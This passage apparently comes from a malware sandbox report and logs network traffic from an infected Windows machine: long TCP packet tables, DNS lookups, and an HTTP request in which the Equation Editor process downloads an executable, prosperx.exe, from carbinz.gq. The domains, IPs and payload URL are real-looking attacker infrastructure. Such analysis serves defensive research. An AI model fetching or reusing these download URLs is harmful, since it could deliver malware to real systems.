                                                            May 4, 2021 05:37:00.837905884 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.837944031 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.837970972 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.837991953 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838013887 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838021040 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838037014 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838052988 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838056087 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838057995 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838078976 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838083029 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838097095 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838105917 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838110924 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838129997 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838145971 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838152885 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838162899 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838175058 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838184118 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838197947 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838210106 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838221073 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838224888 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838247061 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838255882 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838272095 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838282108 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838294029 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838301897 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838318110 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838327885 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838340998 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838345051 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838363886 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838376999 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838387012 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838392019 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838409901 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838421106 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838434935 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838444948 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838459015 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838470936 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838489056 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838534117 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838558912 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838573933 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838582039 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838589907 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838604927 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838615894 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838634014 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838653088 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838680029 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838690996 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838706017 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838707924 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838730097 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838742018 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838767052 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838776112 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838799953 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838814020 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838823080 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838830948 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838845968 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.838857889 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.838879108 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.839071035 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.839117050 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.839122057 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.839148045 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.839159012 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.839173079 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.839175940 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.839206934 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.841594934 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.887001038 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.887090921 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.887118101 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.887140036 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.887164116 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.887186050 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.887187004 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.887212992 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.887218952 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.887238979 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.887243986 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.887260914 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.887271881 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.887284994 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.887294054 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.887309074 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.887316942 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.887331009 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.887340069 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.887353897 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.887360096 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.887376070 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.887384892 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.887402058 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.887406111 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.887425900 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.887428045 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.887460947 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.887476921 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890125036 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890156984 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890181065 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890202999 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890211105 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890227079 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890233040 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890249968 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890253067 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890269995 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890276909 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890288115 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890300989 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890316010 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890324116 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890337944 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890347004 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890369892 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890372038 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890393019 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890393019 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890412092 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890415907 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890429974 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890439034 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890449047 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890464067 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890470982 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890487909 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890502930 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890511990 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890536070 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890542984 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890556097 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890558958 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890574932 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890582085 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890593052 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890604019 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890614986 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890629053 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890645981 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890655041 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890665054 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890680075 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890693903 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890702963 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890714884 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890726089 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890736103 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890749931 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890762091 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890774012 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890782118 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890796900 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890810966 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890820980 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890830994 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890846968 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890857935 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890871048 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890886068 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890894890 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.890918016 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.890933037 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.899482012 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.938554049 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.938596010 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.938620090 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.938643932 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.938666105 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.938693047 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.938719988 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.938749075 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.938785076 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.938790083 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.941555023 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.941765070 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942101955 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942154884 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942183971 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942198992 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942236900 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942255974 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942281008 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942307949 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942311049 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942331076 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942361116 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942374945 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942379951 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942419052 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942442894 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942459106 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942460060 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942487001 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942517996 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942542076 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942564964 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942567110 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942589998 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942594051 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942614079 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942615032 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942634106 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942639112 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942656994 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942662001 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942677021 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942686081 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942697048 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942709923 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942722082 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942733049 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942747116 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942755938 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942769051 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942781925 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942790985 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942806005 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942827940 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942828894 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.942854881 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.942876101 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.944262028 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.950270891 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950306892 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950330019 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950352907 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950375080 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950397968 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950419903 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950429916 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.950445890 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950470924 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950494051 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950516939 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950539112 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950558901 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.950561047 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950577021 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.950583935 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950592995 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.950609922 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950623035 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.950635910 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950640917 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.950659990 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.950681925 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.950699091 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.987510920 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.987536907 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.987555027 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.987579107 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.987601995 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.987626076 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.987689018 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.987706900 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.987746000 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.987765074 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:00.991280079 CEST8049167185.239.243.112192.168.2.22
                                                            May 4, 2021 05:37:00.991453886 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:37:01.421189070 CEST4916780192.168.2.22185.239.243.112
                                                            May 4, 2021 05:38:02.529527903 CEST4916880192.168.2.22154.86.42.252
                                                            May 4, 2021 05:38:02.831165075 CEST8049168154.86.42.252192.168.2.22
                                                            May 4, 2021 05:38:02.831392050 CEST4916880192.168.2.22154.86.42.252
                                                            May 4, 2021 05:38:02.831583023 CEST4916880192.168.2.22154.86.42.252
                                                            May 4, 2021 05:38:03.131807089 CEST8049168154.86.42.252192.168.2.22
                                                            May 4, 2021 05:38:03.327630997 CEST8049168154.86.42.252192.168.2.22
                                                            May 4, 2021 05:38:03.327673912 CEST8049168154.86.42.252192.168.2.22
                                                            May 4, 2021 05:38:03.328196049 CEST4916880192.168.2.22154.86.42.252
                                                            May 4, 2021 05:38:03.328264952 CEST4916880192.168.2.22154.86.42.252
                                                            May 4, 2021 05:38:03.628396988 CEST8049168154.86.42.252192.168.2.22
                                                            May 4, 2021 05:38:53.695688963 CEST4916980192.168.2.22172.217.18.115
                                                            May 4, 2021 05:38:53.736454964 CEST8049169172.217.18.115192.168.2.22
                                                            May 4, 2021 05:38:53.736547947 CEST4916980192.168.2.22172.217.18.115
                                                            May 4, 2021 05:38:53.736740112 CEST4916980192.168.2.22172.217.18.115
                                                            May 4, 2021 05:38:53.778731108 CEST8049169172.217.18.115192.168.2.22
                                                            May 4, 2021 05:38:53.882611036 CEST8049169172.217.18.115192.168.2.22
                                                            May 4, 2021 05:38:53.882694006 CEST8049169172.217.18.115192.168.2.22
                                                            May 4, 2021 05:38:53.882848978 CEST4916980192.168.2.22172.217.18.115
                                                            May 4, 2021 05:38:53.882890940 CEST4916980192.168.2.22172.217.18.115
                                                            May 4, 2021 05:38:53.926191092 CEST8049169172.217.18.115192.168.2.22

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            May 4, 2021 05:37:00.569183111 CEST5219753192.168.2.228.8.8.8
                                                            May 4, 2021 05:37:00.627701044 CEST53521978.8.8.8192.168.2.22
                                                            May 4, 2021 05:38:02.202456951 CEST5309953192.168.2.228.8.8.8
                                                            May 4, 2021 05:38:02.518274069 CEST53530998.8.8.8192.168.2.22
                                                            May 4, 2021 05:38:23.533169031 CEST5283853192.168.2.228.8.8.8
                                                            May 4, 2021 05:38:23.598396063 CEST53528388.8.8.8192.168.2.22
                                                            May 4, 2021 05:38:53.573438883 CEST6120053192.168.2.228.8.8.8
                                                            May 4, 2021 05:38:53.663678885 CEST53612008.8.8.8192.168.2.22

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            May 4, 2021 05:37:00.569183111 CEST192.168.2.228.8.8.80x80acStandard query (0)carbinz.gqA (IP address)IN (0x0001)
                                                            May 4, 2021 05:38:02.202456951 CEST192.168.2.228.8.8.80x708cStandard query (0)www.devarajantraders.comA (IP address)IN (0x0001)
                                                            May 4, 2021 05:38:23.533169031 CEST192.168.2.228.8.8.80xa14dStandard query (0)www.samytango.comA (IP address)IN (0x0001)
                                                            May 4, 2021 05:38:53.573438883 CEST192.168.2.228.8.8.80xccffStandard query (0)www.photograph-gallery.comA (IP address)IN (0x0001)

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            May 4, 2021 05:37:00.627701044 CEST8.8.8.8192.168.2.220x80acNo error (0)carbinz.gq185.239.243.112A (IP address)IN (0x0001)
                                                            May 4, 2021 05:38:02.518274069 CEST8.8.8.8192.168.2.220x708cNo error (0)www.devarajantraders.com154.86.42.252A (IP address)IN (0x0001)
                                                            May 4, 2021 05:38:23.598396063 CEST8.8.8.8192.168.2.220xa14dName error (3)www.samytango.comnonenoneA (IP address)IN (0x0001)
                                                            May 4, 2021 05:38:53.663678885 CEST8.8.8.8192.168.2.220xccffNo error (0)www.photograph-gallery.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                                            May 4, 2021 05:38:53.663678885 CEST8.8.8.8192.168.2.220xccffNo error (0)ghs.googlehosted.com172.217.18.115A (IP address)IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • carbinz.gq
                                                            • www.devarajantraders.com
                                                            • www.photograph-gallery.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.2249167185.239.243.11280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            TimestampkBytes transferredDirectionData
                                                            May 4, 2021 05:37:00.689927101 CEST0OUTGET /modex/prosperx.exe HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: carbinz.gq
                                                            Connection: Keep-Alive
                                                            May 4, 2021 05:37:00.738962889 CEST2INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 04 May 2021 03:37:00 GMT
                                                            Content-Type: application/x-msdownload
                                                            Content-Length: 233896
                                                            Last-Modified: Mon, 03 May 2021 00:19:56 GMT
                                                            Connection: keep-alive
                                                            ETag: "608f41ac-391a8"
                                                            Accept-Ranges: bytes
